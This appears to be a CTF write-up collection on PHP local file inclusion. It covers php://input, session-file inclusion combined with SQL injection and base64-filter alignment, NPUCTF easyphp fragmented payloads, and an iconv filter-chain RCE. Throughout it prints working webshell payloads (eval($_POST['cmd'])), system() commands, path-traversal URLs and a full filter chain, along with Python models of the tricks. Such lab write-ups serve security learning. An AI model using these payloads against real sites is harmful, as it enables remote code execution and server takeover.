PHP file inclusion

"Baidu Cup" CTF 2017, February round: include

`php://filter/convert.base64-encode/resource=index.php` reads any file on the box, but that is of little use here because the flag file's name is unknown. So switch to `php://input`, which makes `include` execute whatever is in the POST body (this only works because `allow_url_include` is enabled on this target; with it off, the `php://input` and `data:` wrappers cannot be included, which is why the 2020 challenge further down has to go through a session file instead):

```
http://ace46edd1c9f412eb50fa9cd198420223e7b80edf0ee4d9c.changame.ichunqiu.com/?path=php://input
```

POST body `<?php system("ls");?>` lists the directory, then `<?php system("cat dle345aae.php | base64");?>` dumps the flag file (base64-encoded so the PHP tags in it are not interpreted on the way out).

Baidu Cup, December round: "Look at my Notebook", session file inclusion


robots.txt then reveals a php1nFo.php file, which the include in action.php will happily load:

```
http://ceb4e4f921b2444eaeb20d272f7a9cef79afe475f5c7447f.game.ichunqiu.com/action.php?module=php&file=php1nFo
```

The phpinfo output shows where session files are stored (the payload below uses /tmp/SESS).
PoC

Register a user whose username is:

```
<?php @eval($_POST[cmd]);?>
```

Log in, then read your own session ID from the cookie:

```
PHPSESSID:e12gf61f8dqd0vfpg4ssntdpc7
```

Then request:

```
http://cd674daadfa14fda832ca1e08c3ad0853810ea5951d34a15.changame.ichunqiu.com/action.php?module=txt&file=../../../tmp/SESS/sess_e12gf61f8dqd0vfpg4ssntdpc7
```

The `file` parameter is path-traversed to the session file; the default `php` session serializer writes the username into it unencoded, so including the file executes the tag and `cmd` becomes a POST webshell.

2020 四叶草 (Clover) CTF: a session inclusion

Two entry points are given: a phpinfo page and an LFI, but remote inclusion is off. Reading and including every file that could be found turned up no flag. Files are read like this:

```
/index.php?action=php://filter/read=convert.base64-encode/resource=login.php
```

The login source looks like this:

```php
<?php
session_start();
error_reporting(0);
header("Content-Type: text/html; charset=UTF-8");
require_once 'config.php';

if(isset($_POST['username']) && isset($_POST['password'])){
    $username = $_POST['username'];
    $password = md5($_POST['password']);
    if($con->connect_error){
        die("db connect error");
    }
    // username is concatenated unescaped: SQL injection
    $sql = "select * from users where username='".$username."' and password='".$password."'";
    $query = $con->query($sql);
    $row = $query->fetch_array();
    if(!empty($row)){
        echo $row['name'];
        // first column of the matched row lands in the session file, base64-encoded
        $_SESSION['username'] = base64_encode($row[0]);
        header('Location: index.php');
        die();
    }else{
        die('<br>login error');
    }
}
?>
```

First, there is an SQL injection. On login the session file keeps the base64 of the first column of the matched row:

```
username|s:8:"YWRtaW4=";
```

The part after `s:8:` is the user's base64. The session file can obviously be included, but at first the base64 encoding seemed impossible to get around. Then it turned out the include can run through a `convert.base64-decode` filter to undo it; the open question was whether the surrounding `username|s:8:"` and `";` would break the decode. Experimentally, once the base64 string is long enough the prefix no longer interferes. Payload: the username is

```
000' union select 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<?php eval(\$_POST[\'cmd\'])?>',3 #
```

with any password. Including the session file then shows

```
/index.php?action=/var/lib/php5/sess_3mck4o350rb2085cunu2mnajk6
```

```
username|s:120:"YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhPD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKT8+";
```

Decode it once more with the filter:

```
/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_3mck4o350rb2085cunu2mnajk6
```

This works, but only with the long run of padding in front of the username. The reason is alignment: `convert.base64-decode` skips bytes that are not in the base64 alphabet (`|`, `:`, `"`, `;`) but keeps the ones that are, so `username`, `s` and the length digits get decoded together with the value. `username|s:8:"` contributes 10 alphabet characters and a two-digit length such as `s:36:` contributes 11, neither a multiple of 4, so the value's groups of four are decoded shifted and come out as garbage. With a three-digit length such as `s:120:` the header contributes exactly 12, the value decodes aligned after 9 bytes of junk, and the `<?php` tag survives. The padding is only there to push the base64 length into three digits (100 to 999); also keep the injected string's byte length a multiple of 3 so its base64 carries no `=`, which ends the decode.
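To make the alignment argument checkable, here is an added Python model (not part of the original writeup) of PHP's `convert.base64-decode` filter applied to a session file written by the default `php` serializer, the same `username|s:N:"…";` layout the Notebook section above includes raw. The skip-non-alphabet and stop-at-`=` behaviour is assumed from the filter's documented semantics; the payload lengths (27 and 90 bytes, `s:36` and `s:120`) come from the page; the session file name and any other session keys are not modelled.

```python
import base64
import string

# Model of PHP's convert.base64-decode stream filter, as used by
# php://filter/read=convert.base64-decode/resource=<session file>.
# Assumed (documented) behaviour: bytes outside the base64 alphabet are skipped,
# decoding stops at the first '=', and everything kept is decoded as ONE stream,
# so each group of four kept characters yields three bytes.
B64_ALPHABET = set(string.ascii_letters + string.digits + "+/")


def lenient_b64decode(data: bytes) -> bytes:
    kept = []
    for byte in data:
        ch = chr(byte)
        if ch == "=":
            break
        if ch in B64_ALPHABET:
            kept.append(ch)
    s = "".join(kept)
    rem = len(s) % 4
    if rem == 1:        # a lone trailing character does not complete a byte
        s = s[:-1]
    elif rem:
        s += "=" * (4 - rem)
    return base64.b64decode(s)


def session_file(username_b64: str) -> bytes:
    """What the default 'php' session serializer writes for
    $_SESSION['username'] = base64_encode($row[0]) (file name not modelled)."""
    return ('username|s:%d:"%s";' % (len(username_b64), username_b64)).encode()


def alphabet_chars_before_value(serialized: bytes) -> int:
    """Base64-alphabet characters the decoder swallows before the value:
    'username', 's' and the length digits of the serialized header."""
    header = serialized.split(b'"', 1)[0]
    return sum(1 for byte in header if chr(byte) in B64_ALPHABET)


def decodes_cleanly(payload: bytes) -> bool:
    """True if including the session file through convert.base64-decode
    reproduces the injected payload bytes intact."""
    enc = base64.b64encode(payload).decode()
    return payload in lenient_b64decode(session_file(enc))


WEBSHELL = b"<?php eval($_POST['cmd'])?>"   # 27 bytes -> 36 base64 chars, s:36
PADDED = b"a" * 63 + WEBSHELL                # 90 bytes -> 120 base64 chars, s:120 (the page's payload)

if __name__ == "__main__":
    for name, payload in (("bare", WEBSHELL), ("padded", PADDED)):
        n = len(base64.b64encode(payload))
        before = alphabet_chars_before_value(session_file("x" * n))
        print("%s: s:%d, %d alphabet chars before the value (%s), webshell survives: %s"
              % (name, n, before, "aligned" if before % 4 == 0 else "misaligned",
                 decodes_cleanly(payload)))
```

Running it shows the bare 27-byte webshell (`s:36`, 11 header characters) coming out scrambled and the 90-byte padded one (`s:120`, 12 header characters) coming out intact; any injected string whose base64 length has three digits and whose byte length is a multiple of 3 behaves like the second case.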

NPUCTF easyphp

This is a message board without a database:

```php
<?php   header('content-type:application/json');
session_start();
function safe($msg) {
    if (strlen($msg)>17) {
        return "msg is too loooong!";
    } else {
        // case-sensitive: "Php" and the "<?=" tag pass through untouched
        return preg_replace("/php/","?",$msg);
    }
}
if (!isset($_SESSION['msg'])&empty($_SESSION['msg']))$_SESSION['msg'] = array();
if (isset($_POST['msg'])) {
    // each filtered msg is appended to the array stored in the session file
    array_push($_SESSION['msg'], ['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]);
    echo json_encode(array(['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]));
    exit();
}
if(!empty($_SESSION['msg'])) {
    echo json_encode($_SESSION['msg']);
} else {
    echo "?????????????????€???";
}
?>
```

In short, the msg you submit is dropped into the session, with two restrictions: a length limit of 17 bytes, and storage as an array, so each message becomes a separate serialized entry with timestamp and key names between them; `php` is also banned. Two details make it exploitable anyway: `preg_replace("/php/", ...)` is case-sensitive, so both `<?=` and `<?Php` survive, and the serialized junk between two entries can be swallowed by a `/* ... */` comment, so a file inclusion of the session file joins the fragments into one statement.

Official payload:

```
<?=$a=$_GET;/*
*/$a[1]($a[2]);?>
```

The payload I used at the time, roughly the same idea:

```
<?Php /*
*/$a=$_GET;/*
*/extract($a);/*
*/eval($b);?>
```
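To see how the fragments are reassembled, here is an added Python model (not part of the challenge or this writeup) of `safe()`, of what the default `php` session serializer writes for `$_SESSION['msg']`, and of what a file inclusion would execute from that file. The timestamp is a constructed placeholder, and the tag regex assumes that only `<?=` and `<?php` (any case) open PHP code, which is the case when `short_open_tag` is off.

```python
import re

MAX_LEN = 17   # strlen($msg) > 17 is rejected


def safe(msg: str) -> str:
    """Model of the challenge's safe(): reject anything longer than 17 bytes,
    otherwise replace each literal, lower-case 'php' with '?'."""
    if len(msg.encode()) > MAX_LEN:
        return "msg is too loooong!"
    return re.sub(r"php", "?", msg)


def php_str(value: str) -> str:
    """PHP serialize() of a string: s:<byte length>:"<bytes>";"""
    return 's:%d:"%s";' % (len(value.encode()), value)


def session_record(msgs, stamp="2020-04-25 12:00:00"):
    """What the default 'php' session serializer writes for $_SESSION['msg']
    after each POST has gone through safe(): an array of {msg, time} arrays.
    The timestamp is a constructed placeholder."""
    entries = []
    for i, msg in enumerate(msgs):
        entries.append("i:%d;a:2:{%s%s%s%s}" % (
            i, php_str("msg"), php_str(safe(msg)), php_str("time"), php_str(stamp)))
    return "msg|a:%d:{%s}" % (len(msgs), "".join(entries))


def executed_code(source: str) -> list:
    """Statements a file inclusion of `source` would run. Assumptions of this
    model: code is opened only by '<?=' or '<?php' (any case) and closed by '?>';
    text outside the tags is merely echoed; /* ... */ comments are discarded."""
    blocks = re.findall(r"<\?(?:=|(?i:php)\s)(.*?)\?>", source, flags=re.S)
    return [re.sub(r"/\*.*?\*/", "", block, flags=re.S).strip() for block in blocks]


OFFICIAL = ["<?=$a=$_GET;/*", "*/$a[1]($a[2]);?>"]                          # 14 and 17 bytes
MINE = ["<?Php /*", "*/$a=$_GET;/*", "*/extract($a);/*", "*/eval($b);?>"]  # 8, 13, 16, 13 bytes

if __name__ == "__main__":
    for label, msgs in (("official", OFFICIAL), ("mine", MINE),
                        ("too long", ["<?php phpinfo();?>"]),
                        ("php stripped", ["<?php eval($b)?>"])):
        record = session_record(msgs)
        print(label, "->", executed_code(record) or "nothing executes")
```

The two working payloads collapse to `$a=$_GET;$a[1]($a[2]);` and `$a=$_GET;extract($a);eval($b);`, while a naive one-liner either exceeds 17 bytes or loses its `php` and never opens a PHP tag.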

File inclusion RCE

This is a PHP filter chain of the kind produced by php_filter_chain_generator: each `convert.iconv` step prepends bytes that survive the following `convert.base64-decode`, so the chain builds PHP code at the front of whatever the resource contains. The resource (`/proc/1/status` here) only has to be readable, and the `0=id` query parameter supplies the command to the generated stub.

```
http://localhost:18084/index.php?0=id&&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/proc/1/status
```